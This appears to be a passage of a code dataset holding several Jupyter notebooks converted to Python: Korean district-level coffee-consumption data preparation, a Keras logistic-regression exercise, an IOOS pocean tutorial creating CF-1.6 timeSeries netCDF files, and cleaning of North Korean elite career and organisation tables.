outputId=\"260c9d16-0ebb-40b5-92a0-52194b1a95f6\"\nfinal_data\n\n# + id=\"9T-Sgxq-jXg1\"\nfinal_data = final_data[final_data['행정동'] 
!= '소계']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"Mk5-2xHDg4UB\" outputId=\"a658bc16-0247-467a-8550-9ebac3c5f6df\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 49} id=\"rRzB2FiNjgBU\" outputId=\"ce733222-efab-4257-bebd-e504093080b6\"\nfinal_data[final_data['행정동'] == 0]\n\n# + id=\"6izI-Zb_kWGh\"\nfinal_data.to_csv('file.csv',encoding='utf-8-sig')\n\n# + id=\"edfHpw-ukMUf\"\ncoffee = '/content/gdrive/MyDrive/기계학습 기초/행정동별_커피분야_소비인구_201127.csv'\n\n# + id=\"kFeqS6_WsIf5\"\ncoffee_df = pd.read_csv(coffee)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"GtBgc5bJsVBn\" outputId=\"9734b3ea-61c3-49e8-a8e6-156c228fbc56\"\ncoffee_df\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"LImxzh5zxLuy\" outputId=\"50a146f6-c9a0-4cf4-8904-0e876c870653\"\ncoffee_df.columns\n\n# + id=\"50L_T5Azw382\"\ncoffee_s = coffee_df[coffee_df['bntr_nm'] == '서울특별시']\ncoffee_b = coffee_df[coffee_df['bntr_nm'] == '부산광역시']\ncoffee_df = pd.concat([coffee_s,coffee_b])\n\n# + id=\"uTXIKDUmvAYQ\"\ncoffee_df['행정동'] = coffee_df['adstrd_nm']\n\n# + id=\"gqGldct_sWth\"\ncoffee_df['커피 소비 인구'] = coffee_df['cnsmr_popltn_co']\n\n# + id=\"v3ZgiBWwu5Bs\"\ncoffee_df = coffee_df[['행정동','커피 소비 인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"gN3JtqwnvME2\" outputId=\"69b451f2-a860-4cee-c1bb-34b0d9fb8de2\"\ncoffee_df\n\n# + id=\"HB1pGvRCw07e\"\n\n\n# + id=\"0oo3R-81wkFi\"\ncoffee_df = coffee_df.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"bMKXcFibwooU\" outputId=\"4d1cae95-924a-4f1a-c862-f5b9fb4f88cf\"\ncoffee_df\n\n# + id=\"xrdTk06GvQvl\"\narea = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동 면적.xlsx'\n\n# + id=\"DipngH5uwVvA\"\narea_df = pd.read_excel(area)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"T-hhS8DowYh1\" outputId=\"8f27e0b6-814e-4f80-def8-182eb04170d0\"\narea_df\n\n# + id=\"AKTG4eSLweae\"\ncoffee_data = pd.merge(coffee_df, area_df ,how = 'outer', on = '행정동')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"svynxgvCxpj7\" outputId=\"566ea406-d3cc-47f8-b5da-8d49926e087f\"\ncoffee_data\n\n# + id=\"wEXPTf4hxtkX\"\ncoffee_data = coffee_data.replace(np.nan, 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"4TjCr_Vgx7Pj\" outputId=\"f4ac2acc-e3db-4a60-bb54-466e0bc6821f\"\ncoffee_data\n\n# + id=\"J65-kYJTx8rt\"\ncoffee_data['면적 대비 커피 소비 인구'] = coffee_data['커피 소비 인구']/coffee_data['면적']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"23BeJiXsyIV6\" outputId=\"b599ecdc-6ee1-4236-a978-802089aeee49\"\ncoffee_data\n\n# + id=\"NHvAtgnayJlW\"\ncoffee_data.to_csv('coffee.csv',encoding='utf-8-sig')\n\n# + id=\"11dlic6mgI70\"\ncoffee_data['label'] = coffee_data['면적 대비 커피 소비 인구']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"hjchJ6BvyUMA\" outputId=\"28f47042-d131-40be-d832-718c129df700\"\ncoffee_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"61IAymiLbzcE\" outputId=\"e84a865c-78b0-408f-abf6-5496d35c43cd\"\ncoffee_data['label'][coffee_data['면적 대비 커피 소비 인구'] > 233686.0203619244] = 1\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"C6hiXfvOhZtL\" outputId=\"7e0c7ca1-f77d-47ec-cbb7-5c0495146d72\"\ncoffee_data['label'][coffee_data['면적 대비 커피 소비 인구'] <= 233686.0203619244] = 2\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} 
id=\"YSX7mWQ9hiqC\" outputId=\"fd2c6971-dfd4-4fab-a813-211fb5b47413\"\ncoffee_data\n\n# + id=\"Hhmx6x2udQJR\"\ncoffee_data = coffee_data[['행정동','면적 대비 커피 소비 인구','label']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"tX0aQ-8mhz-d\" outputId=\"c87cf834-0069-4475-8009-28ae8c708f2c\"\ncoffee_data\n\n# + id=\"y5H-Pgwpi-t_\"\ncoffee_data = coffee_data[coffee_data['행정동'] != '소계']\n\n# + id=\"0ukCs7mjidGT\"\nfinal_data = pd.merge(final_data, coffee_data,how = 'outer', on = '행정동')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 624} id=\"4WZhGtJTip7P\" outputId=\"f0d986d5-3368-4205-dbd8-f04135526211\"\nfinal_data\n\n# + id=\"EIqM9AKzifTv\"\n결측인덱스4 = final_data.isnull().query(\"교과학원분야_소비인구 == True and 동네가게_소비인구 == True\").index\n\n# + id=\"NKZHCEncippE\"\nfinal_data = final_data.drop(결측인덱스4, axis = 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 606} id=\"YKNlzLKDitop\" outputId=\"10a1d294-e7a9-47d9-988e-cb370ee7d1ff\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 111} id=\"23obMFDWSBFX\" outputId=\"24787e0e-ca32-494b-9fb7-6c1e0abfb26d\"\nfinal_data[final_data['행정동'].isnull()]\n\n# + id=\"EnsImU5BiyN4\"\nfinal_data = final_data.replace(np.nan, 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 606} id=\"zjlIiexui3EV\" outputId=\"c625cd4c-6d2c-4aea-bd73-69d6e121d660\"\nfinal_data\n\n# + id=\"WZOuo0iUi5wF\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 529} outputId=\"55f79739-9366-49fe-e90d-7f93f1df4a88\"\ndel final_data['행정동 코드']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 606} id=\"K3QIB3MNjyHF\" outputId=\"263aaaf3-1fd9-407f-d038-2696823554dc\"\nfinal_data\n\n# + id=\"vOpfS2K5jAPk\"\nfinal_data[final_data['행정동'] == 0]\n\n# + id=\"FrqyiEpujzJs\"\nfinal_data.to_csv('final_clustering.csv',encoding='utf-8-sig')\n\n# + id=\"Ou_-syvFj9ce\"\n\n","repo_name":"jinchank0959/machine-learning-vending-machine","sub_path":"클러스터링_데이터_셋.ipynb","file_name":"클러스터링_데이터_셋.ipynb","file_ext":"py","file_size_in_byte":19884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"31756873821","text":"# Fill in the missing code (#####) to use a NN to define a logistic regression. 
\n\n# %matplotlib inline\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport tensorflow as tf\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\nimport numpy as np\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\nfrom matplotlib import pyplot\nfrom sklearn.datasets import make_regression\nfrom sklearn.preprocessing import StandardScaler\nimport keras\n\n# +\nnum_features = 20\n# generate regression dataset\nX, y = make_regression(n_samples=1000, n_features=num_features, noise=0.1, random_state=1)\n\n# split into train and test\nn_train = 500\ntrainX, testX = X[:n_train, :], X[n_train:, :]\ntrainy, testy = y[:n_train], y[n_train:]\n\n# reshape 1d arrays to 2d arrays\ntrainy = trainy.reshape(len(trainy), 1)\ntesty = testy.reshape(len(testy), 1)\n\n# create scaler\nscaler = StandardScaler()\n# fit scaler on training dataset\nscaler.fit(trainy)\n# transform training dataset\ntrainy = scaler.transform(trainy)\n# transform test dataset\ntesty = scaler.transform(testy)\n\n# fit scaler on training dataset\nscaler.fit(trainX)\n# transform training dataset\ntrainX = scaler.transform(trainX)\n# transform test dataset\ntestX = scaler.transform(testX)\n# -\n\n# Transform the trainy and testy data into 1 and 0 labels\n##### as many as needed\ndf = pd.DataFrame(trainy, columns=['y'])\ndf['lab']=np.where(df.y.shift(-1)>df.y,1,0) #like price prediction\ntrainy=df.lab.fillna(0).values\ndf = pd.DataFrame(testy, columns=['y'])\ndf['lab']=np.where(df.y.shift(-1)>df.y,1,0) #like price prediction\ntesty=df.lab.fillna(0).values\n\n# logistic regression with scaled inputs and outputs on the regression problem\n# define model\nmodel = Sequential()#####\nmodel.add(Dense(1, activation='sigmoid',kernel_initializer='he_uniform',kernel_regularizer=keras.regularizers.L1L2(l1=0.0, l2=0.1),input_dim=20))#####\n##### as many as needed\n#compile the model\nmodel.compile(optimizer=SGD(lr=0.01, momentum=0.9),loss='binary_crossentropy',metrics=['accuracy'])#####\nhistory = model.fit(trainX, trainy, epochs=100,validation_data=(testX, testy))\n# evaluate the model\ntrain_e = model.evaluate(trainX, trainy, verbose=1)\ntest_e = model.evaluate(testX, testy, verbose=1)\nprint('Train loss: %.3f, Test loss: %.3f' % (train_e[0], test_e[0])) \nprint('Train metric: %.3f, Test metric: %.3f' % (train_e[1], test_e[1])) \n#plot loss during training\nplt.title('Loss / Error')\nplt.plot(history.history['loss'], label='train')\nplt.plot(history.history['val_loss'], label='test')\nplt.legend()\nplt.show()\n\n# For documentation see:\n# https://archive.ph/71Dvs \n","repo_name":"xzq715487899/AI_FINANCE","sub_path":"HWKeras_Steven_Xie/2.NN_logistic_regression_complete.ipynb","file_name":"2.NN_logistic_regression_complete.ipynb","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"72645033064","text":"# + tags=[\"remove-cell\"]\nimport subprocess\nimport sys\n\nCOLAB = \"google.colab\" in sys.modules\n\n\ndef _install(package):\n if COLAB:\n ans = input(f\"Install { package }? 
[y/n]:\")\n if ans.lower() in [\"y\", \"yes\"]:\n subprocess.check_call(\n [sys.executable, \"-m\", \"pip\", \"install\", \"--quiet\", package]\n )\n print(f\"{ package } installed!\")\n\n\ndef _colab_install_missing_deps(deps):\n import importlib\n\n for dep in deps:\n if importlib.util.find_spec(dep) is None:\n if dep == \"iris\":\n dep = \"scitools-iris\"\n _install(dep)\n\n\ndeps = [\"oceans\", \"pocean-core\"]\n_colab_install_missing_deps(deps)\n# -\n\n# # Creating a CF-1.6 timeSeries using pocean\n#\n# Created: 2018-02-27\n#\n# IOOS recommends to data providers that their netCDF files follow the CF-1.6 standard. In this notebook we will create a [CF-1.6 compliant](https://cfconventions.org/latest.html) file that follows file that follows the [Discrete Sampling Geometries](https://cfconventions.org/Data/cf-conventions/cf-conventions-1.7/build/ch09.html) (DSG) of a `timeSeries` from a pandas DataFrame.\n#\n# The `pocean` module can handle all the DSGs described in the CF-1.6 document: `point`, `timeSeries`, `trajectory`, `profile`, `timeSeriesProfile`, and `trajectoryProfile`. These DSGs array may be represented in the netCDF file as:\n#\n# - **orthogonal multidimensional**: when the coordinates along the element axis of the features are identical;\n# - **incomplete multidimensional**: when the features within a collection do not all have the same number but space is not an issue and using longest feature to all features is convenient;\n# - **contiguous ragged**: can be used if the size of each feature is known;\n# - **indexed ragged**: stores the features interleaved along the sample dimension in the data variable.\n#\n# Here we will use the orthogonal multidimensional array to represent time-series data from am hypothetical current meter. We'll use fake data for this example for convenience.\n#\n# Our fake data represents a current meter located at 10 meters depth collected last week.\n\n# +\nfrom datetime import datetime, timedelta\n\nimport numpy as np\nimport pandas as pd\n\nx = np.arange(100, 110, 0.1)\nstart = datetime.now() - timedelta(days=7)\n\ndf = pd.DataFrame(\n {\n \"time\": [start + timedelta(days=n) for n in range(len(x))],\n \"longitude\": -48.6256,\n \"latitude\": -27.5717,\n \"depth\": 10,\n \"u\": np.sin(x),\n \"v\": np.cos(x),\n \"station\": \"fake buoy\",\n }\n)\n\n\ndf.tail()\n# -\n\n# Let's take a look at our fake data.\n\n# +\n# %matplotlib inline\n\n\nimport matplotlib.pyplot as plt\nfrom oceans.plotting import stick_plot\n\nq = stick_plot([t.to_pydatetime() for t in df[\"time\"]], df[\"u\"], df[\"v\"])\n\nref = 1\nqk = plt.quiverkey(\n q, 0.1, 0.85, ref, f\"{ref} m s$^{-1}$\", labelpos=\"N\", coordinates=\"axes\"\n)\n\nplt.xticks(rotation=70)\n# -\n\n# `pocean.dsg` is relatively simple to use. 
The user must provide a DataFrame, like the one above, and a dictionary of attributes that maps to the data and adhere to the DSG conventions desired.\n#\n# Because we want the file to work seamlessly with ERDDAP we also added some ERDDAP specific attributes like `cdm_timeseries_variables`, and `subsetVariables`.\n\nattributes = {\n \"global\": {\n \"title\": \"Fake mooring\",\n \"summary\": \"Vector current meter ADCP @ 10 m\",\n \"institution\": \"Restaurant at the end of the universe\",\n \"cdm_timeseries_variables\": \"station\",\n \"subsetVariables\": \"depth\",\n # These are only the required attributions from\n # https://ioos.github.io/ioos-metadata/ioos-metadata-profile-v1-2.html#attribution\n \"creator_country\": \"USA\",\n \"creator_email\": \"fake_email@somedomain.org\",\n \"creator_institution\": \"IOOS\",\n \"creator_sector\": \"academic\",\n \"creator_url\": \"https://ioos.github.io/ioos_code_lab/content/intro.html\",\n \"publisher_country\": \"USA\",\n \"publisher_email\": \"fake_email@somedomain.org\",\n \"publisher_institution\": \"IOOS\",\n \"publisher_url\": \"https://ioos.github.io/ioos_code_lab/content/intro.html\",\n },\n \"longitude\": {\n \"units\": \"degrees_east\",\n \"standard_name\": \"longitude\",\n },\n \"latitude\": {\n \"units\": \"degrees_north\",\n \"standard_name\": \"latitude\",\n },\n \"z\": {\n \"units\": \"m\",\n \"standard_name\": \"depth\",\n \"positive\": \"down\",\n },\n \"u\": {\n \"units\": \"m/s\",\n \"standard_name\": \"eastward_sea_water_velocity\",\n },\n \"v\": {\n \"units\": \"m/s\",\n \"standard_name\": \"northward_sea_water_velocity\",\n },\n \"station\": {\"cf_role\": \"timeseries_id\"},\n}\n\n# We also need to map the our data axes to `pocean`'s defaults. This step is not needed if the data axes are already named like the default ones.\n\naxes = {\"t\": \"time\", \"x\": \"longitude\", \"y\": \"latitude\", \"z\": \"depth\"}\n\n# +\nfrom pocean.dsg.timeseries.om import OrthogonalMultidimensionalTimeseries\nfrom pocean.utils import downcast_dataframe\n\ndf = downcast_dataframe(df) # safely cast depth np.int64 to np.int32\ndsg = OrthogonalMultidimensionalTimeseries.from_dataframe(\n df,\n output=\"fake_buoy.nc\",\n attributes=attributes,\n axes=axes,\n)\n# -\n\n# The `OrthogonalMultidimensionalTimeseries` saves the DataFrame into a CF-1.6 TimeSeries DSG.\n\n# !ncdump -h fake_buoy.nc\n\n# It also outputs the dsg object for inspection. Let us check a few things to see if our objects was created as expected. 
(Note that some of the metadata was \"free\" due to the built-in defaults in `pocean`.)\n\ndsg.getncattr(\"featureType\")\n\ntype(dsg)\n\n# In addition to the standard `netCDF4-python` object `.variables` method, `pocean`'s DSGs provide a \"categorized\" version of the variables in the `data_vars`, `ancillary_vars`, and the DSG axes methods.\n\n[(v.standard_name) for v in dsg.data_vars()]\n\ndsg.axes(\"T\")\n\ndsg.axes(\"Z\")\n\ndsg.vatts(\"station\")\n\ndsg[\"station\"][:]\n\ndsg.vatts(\"u\")\n\n# We can easily round-trip back to the pandas DataFrame object.\n\ndsg.to_dataframe().head()\n\n# For more information on `pocean`, please check the [docs](https://pyoceans.github.io/pocean-core/).\n","repo_name":"ioos/ioos_code_lab","sub_path":"jupyterbook/content/code_gallery/data_management_notebooks/2018-02-27-pocean-timeSeries-demo.ipynb","file_name":"2018-02-27-pocean-timeSeries-demo.ipynb","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"33818589123","text":"import pandas as pd\nimport numpy as np\n\n# # Tables\n#\n# ### 1. LeaderCareerLink (LeaderID, CareerString, CareerDateString_2022)\n#\n# matches LeaderID with (CareerString, CareerDateString_2022)\n#\n# - LeaderID\n# - CareerString\n# - CareerDateString_2022\n#\n# ### 2. CareerOrgLink (CareerString, CareerDateString_2022, CareerSubstring)\n#\n# matches (CareerString,CareerDateString_2022,CareerSubstring) with (InstitutionType,PrimaryInstitution,OrgName,Position)\n#\n# - CareerString\n# - CareerDateString_2022\n# - IsJob\n# - MultipleSubstrings\n# - CareerStartYear\n# - CareerStartMonth\n# - CareerSubstring\n# - OrgString\n# - InstitutionType\n# - PrimaryInstitution\n# - OrgName\n# - Position\n# - Notes\n#\n# ### 3. 
Orgtree (InstitutionType, PrimaryInstitution, OrgName)*\n#\n# contains variables relevant to all (PI, Org) including PI/Org Types, Positions, Org/Pos Ranks, PI/Org Links, Aliases\n#\n# - InstitutionType\n# - OrgType\n# - PrimaryInstitution\n# - OrgName\n# - PI_Index\n# - OrgRank\n# - P1\n# - P2\n# - P3\n# - LinkToNext_PI\n# - LinkToNext_Org\n# - LinkToNext_Year\n# - Alias_OrgName\n# - Notes\n\npath_tables = \"C:/Users/seoul/Dropbox/00 technical/github/nkelites/data/combined data/combined data - 2 tables/\"\n\n# current, but I won't use them in 2.6.1.1\nfilename_careers = \"careers.xlsx\"\nfilename_leadercareerlink = \"leadercareerlink.xlsx\"\n\n# +\n# deprecated\n\n# filename_leaderjoblink = \"leaderjoblink.xlsx\"\n# filename_joborglink = \"joborglink.xlsx\"\n\n# +\n# filenames of tables to output\n\nfilename_careerorglink = \"careerorglink.xlsx\"\nfilename_orgtree = \"orgtree.xlsx\"\n# -\n\n# # Data - initial orgtree + manually cleaned data in 2.7 orgtree position & rank\n\npath_cleaning = \"C:/Users/seoul/Dropbox/00 technical/github/nkelites/data/combined data/combined data - 1 cleaning/cleaning step 2 - career/\"\n\nsubpath_2_1 = \"2.1 career_undivided_unparsed_uncoded/\"\nsubpath_2_2 = \"2.2 career_divided_unparsed_uncoded/\"\nsubpath_2_3 = \"2.3 joborglink/\"\nsubpath_2_4 = \"2.4 orgtree/\"\nsubpath_2_5 = \"2.5 position/\"\nsubpath_2_6 = \"2.6 career_reassembled/\"\nsubpath_2_7 = \"2.7 orgtree position & rank/\"\n\n# +\n# old careers table, merged with orgs \n\nfilename_careers = \"2.0_careerorglink.xlsx\"\ncareers = pd.read_excel(path_cleaning + subpath_2_7 + filename_careers,dtype=\"str\")\ncareers.shape\n# -\n\ncareers[careers[\"CareerString\"].isna()]\n\n# +\n# 1.1 orgtree_position_rank\n\n# constructed new file from:\n## 2022 북한_기관별_인명록_북한정보포털 게재용 + old orgtree table\n\nfilein_opr = \"1.1 orgtree_position_rank.xlsx\"\nopr = pd.read_excel(path_cleaning + subpath_2_7 + filein_opr,dtype=\"str\")\nopr.shape\n# -\n\nopr.head(2)\n\n# +\n# 2.0_mismatch_\n\n# 2.0_mismatch_정권_1_Esther\n# 2.0_mismatch_정권_1_Jeongsu\n# 2.0_mismatch_당_1_Esther_August.6.ES\n# 2.0_mismatch_당_1_Jeongsu\n# 2.0_mismatch_군및기타_1_ingov_JS\n# 2.0_mismatch_군및기타_1_outgov_JR\n\nmismatch_filenames = [\n \"2.0_mismatch_정권_2_Jacob.xlsx\",\n \"2.0_mismatch_당_2_Jacob.xlsx\",\n \"2.0_mismatch_군및기타_1_ingov_JS.xlsx\",\n \"2.0_mismatch_군및기타_1_outgov_JR.xlsx\"\n]\n\n# +\n# select columns in mismatch dfs\n\nmismatch_columns = [\"CareerString\", \"CareerStartYear\", \"MultipleSubstrings\", \"CareerSubstring\", \"IsJob\",\n \"InstitutionType\", \"PrimaryInstitution\", \"OrgName\", \"Position\", \"LinkToNext_Year\",\n \"Resolution\", \"Change_PI\", \"Change_OrgName\", \"Change_Position\",\"Notes\"]\n\n# +\n# read in mismatch dfs\n\nm_dfs = []\n\nfor filename in mismatch_filenames:\n df = pd.read_excel(path_cleaning + subpath_2_7 + filename,sheet_name=\"Sheet1\",dtype=\"str\")\n df = df[mismatch_columns]\n print(df.shape)\n m_dfs.append(df)\n\nprint(len(m_dfs))\n\n# +\n# concat mismatch dfs into a single df\n\nm = pd.concat(m_dfs)\nm.shape\n# -\n\nm.head(2)\n\n\n# # Functions: format orgtree\n\n# +\n# using this on (PI,OrgName) will ensure unique & non-null keys\n# using this on a larger df will ensure unique rows and non-null keys, but not unique keys\n\ndef unique_non_null_rows(olddf):\n \n df = olddf.copy()\n \n \n ### drop duplicates\n df = df.drop_duplicates(keep=\"first\",ignore_index=True)\n\n ### drop null rows\n df.dropna(how=\"all\",axis=0,inplace=True)\n \n # drop rows with null PI\n df = 
df[~(df[\"PrimaryInstitution\"].isna())]\n \n ### drop rows where PI contains stop words\n stop_words_lower = [\"uncertain\",\"current\",\"deprecated\",\"please_revise\"]\n df = df[ ~ df[\"PrimaryInstitution\"].str.lower().isin(stop_words_lower)]\n \n\n print(\"\\nUnique Non-null Rows...\")\n print(\"\")\n print(\"\\tNon-unique rows:\",olddf.shape)\n print(\"\\tUnique rows :\",df.shape)\n\n ### sort\n df = df.sort_values([\"PrimaryInstitution\",\"OrgName\"])\n \n return df\n\n\n# -\n\ndef verify_unique_rows(df):\n \n key_columns = [\"PrimaryInstitution\",\"OrgName\"]\n print(\"\\nVerifying Unique Rows...\")\n print(\"\")\n print(\"\\tDuplicate Rows:\",df[df.duplicated(keep=False)].shape)\n print(\"\\tDuplicate Keys:\",df[df.duplicated(key_columns,keep=False)].shape)\n print(\"\\tNull Rows :\",df[df[\"PrimaryInstitution\"].isna() & df[\"OrgName\"].isna()].shape)\n\n\ndef merge_results(m):\n \n print(\"\\nMerge Results...\")\n print(\"\")\n print(\"\\tshape :\",m.shape)\n print(\"\\tleft_only :\",m[m[\"_merge\"]==\"left_only\"].shape)\n print(\"\\tboth :\",m[m[\"_merge\"]==\"both\"].shape)\n print(\"\\tright_only:\",m[m[\"_merge\"]==\"right_only\"].shape)\n\n\ndef update_opr_index(opr,max_level):\n \n # create and clear out existing Level Indicies\n opr[\"OrgRank\"]=np.nan\n opr[\"L1_Index\"]=np.nan\n opr[\"L2_Index\"]=np.nan\n opr[\"L3_Index\"]=np.nan\n opr[\"L4_Index\"]=np.nan\n opr[\"L5_Index\"]=np.nan\n \n # pad PI_Index with missing 0s up to the deepest level (4 or 5?)\n opr[\"PI_Index\"] = opr.apply(lambda x: str(x[\"PI_Index\"]) + ((max_level-1)-str(x[\"PI_Index\"]).count(\".\")) * \".0\",axis=1)\n \n # calculate OrgRank\n opr[\"OrgRank\"] = opr.apply(lambda x: (max_level-1) - str(x[\"PI_Index\"]).count(\".0\"),axis=1)\n \n # populate Level Indices using PI_Index\n opr.loc[opr[\"PI_Index\"].notna(),\"L1_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[0],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L2_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[1],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L3_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[2],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L4_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[3],axis=1)\n opr.loc[opr[\"PI_Index\"].notna(),\"L5_Index\"] = opr.loc[opr[\"PI_Index\"].notna()].apply(lambda x: str(x[\"PI_Index\"]).split(\".\")[4],axis=1)\n\n # sort by Level1, Level2, Level3\n sort_columns = [\"L1_Index\",\"L2_Index\",\"L3_Index\",\"L4_Index\",\"L5_Index\"]\n #opr.L1_Index.astype(int,errors=\"ignore\")\n #opr.L2_Index.astype(int,errors=\"ignore\")\n #opr.L3_Index.astype(int,errors=\"ignore\")\n opr.sort_values(sort_columns,inplace=True)\n \n return opr\n\n\n# +\n# opr = update_opr_index(opr,5)\n\n# +\n# export opr\n\n# fileout_opr = \"1.0 orgtree_position_rank.xlsx\"\n# opr.to_excel(path_cleaning + subpath_2_7 + fileout_opr,index=False)\n# -\n\n# # Recall from earlier cleaning\n#\n# #### Three Cases of OrgName in NK elite career data\n#\n# - Case 0: OrgName in 기관별인명록: code these from 1-199\n# - Case 1: OrgName not in 기관별인명록, but contained in data AND LinkToNext_Year not current: code as 500+\n# - Case 2: OrgName not in 기관별인명록, but contained in data AND LinkToNext_Year is current: code as 200+\n#\n# #### Case 0: OrgName in 기관별인명록\n#\n# - Update 1.0 orgtree_position_rank with OrgName in 기관별인명록\n# - Code these from 1-199\n# - Run above 
routine # 1. orgtree_position_rank: update all besides 노동당, 내각, 정무원\n# - to update opr & pr_else3\n# - Proceed to Cases 1 & 2\n#\n# #### Resolve. Validation values for resolving null Position_3P\n#\n# 1. OrgName & Position ok. Add Position to P1\n# 2. OrgName & Position ok. Add Position to P2\n# 3. OrgName & Position ok. Add Position to P3\n# 4. Change_OrgName and/or Change_Position\n# 5. Uncertain OrgName\n# 6. Uncertain Position\n# 7. NotJob\n# 8. Multiple CareerSubstring\n# 9. Other - see Notes\n\n# # Task 1. Prep & Merge Mismatch\n#\n# - NotJob\n# - careers: change IsJob from True to False\n# - m: remove rows \n# - opr: NA\n# \n# - MultipleSubstrings\n# - careers: expand rows\n# - m: expand rows and code\n# - opr: NA\n# \n# - Merge mismatch files\n\nm_notjob_columns = [\"CareerString\",\"CareerStartYear\",\"CareerSubstring\"]\n# m_notjob = m[(m.IsJob==\"False\") | (m.Resolution==\"7. NotJob\")]\nm_notjob = m.loc[(m.IsJob==\"False\") | (m.Resolution==\"7. NotJob\"),m_notjob_columns]\nm_notjob.shape\n\nm_notjob.drop_duplicates(inplace=True)\nm_notjob.shape\n\ncareers1 = careers.merge(m_notjob,on=m_notjob_columns,how=\"left\",indicator=True)\nmerge_results(careers1)\n\n# +\n# careers1[careers1[\"_merge\"]==\"both\"]\n# -\n\ncareers1.loc[careers1[\"_merge\"]==\"both\",\"IsJob\"]=\"False\"\n\nm1 = m[~((m.IsJob==\"False\") | (m.Resolution==\"7. NotJob\"))]\nm1.shape\n\ncareers1.drop(columns=[\"_merge\"],inplace=True)\ncareers1.shape\n\n# confirm no cases of IsJob = False\nm1[(m1.IsJob==\"False\") | (m1.Resolution==\"7. NotJob\")].shape\n\n# confirm no cases of 8. Multiple CareerSubstring\nm_msub = m[m.Resolution==\"8. Multiple CareerSubstring\"]\nm_msub.shape\n\n# +\n\ncareerorglink_columns = [\"CareerString\", \"CareerDateString_2022\", \"IsJob\", \"MultipleSubstrings\", \n \"CareerStartYear\", \"CareerStartMonth\", \"CareerSubstring\", \n \"OrgString\", \"InstitutionType\", \"PrimaryInstitution\", \"OrgName\", \"Position\", \"Notes\"]\ncareers1[\"InstitutionType\"]=np.nan\ncareers1 = careers1[careerorglink_columns]\n# -\n\n# export careerorglink to cleaning\nfilename_careerorglink_new = \"2.1 careerorglink.xlsx\"\ncareers1.to_excel(path_cleaning + subpath_2_7 + filename_careerorglink_new,index=False)\n\n# export merged mismatches to cleaning\nfilename_mimatch = \"2.1 mismatch_통합.xlsx\"\nm1.to_excel(path_cleaning + subpath_2_7 + filename_mimatch,index=False)\n\n# +\n### these tables not changed\n\n# orgtree (1.1 orgtree_position_rank)\n# leadercareerlink\n# -\n\n# # Task 2. Edit & Validate PI, OrgName, Type, Index\n#\n#\n# - Change_PI, Change_OrgName\n# - For 200 & 500 series PrimaryInstitutions, search whether they are contained in OrgName, within a PrimaryInstitution\n# \t- 인민회의 or 인민위원회?\n# - 노동당 총정치국 --> 인민군 총정치국\n# - alias the PrimaryInstitutions, 내각, 내각A, 내각B, 등 at least when calculating whether transitions are between or across institutions\n# - add 북조선노동당 as an alias to 노동당\n#\n#\n\n# - Review Integrity Checks & Adjust Mismatches\n# - Validate InstitutionType, OrgType\n# - Data in Careers but not in Orgtree\n# - Orgs in Orgtree but not in Careers or 기관별인명록\n# - Verify no Positions overlapping within the same PI, OrgName\n\n# - Recode & Recategorize some (PI,OrgName)\n# - 중앙위원회\n# - 인민군, 총참모부, 인민무력부, \n# - 국방위원회: 인민군?\n# - 중앙인민위원회: 정권기관\n# - 국제친선기관: I will add and match existing ones\n# - 노동당 - fix the old party organization\n# - https://encykorea.aks.ac.kr/Article/E0070188\n# - 1947년 북조선로동당 ‘5과’로 창설되었다. 6·25전쟁기 남한지역 내 게릴라부대의 지하당 공작 과정에서 대남 공작기구를 확대하면서 당 조직부 내의 연락부를 분리했다. 
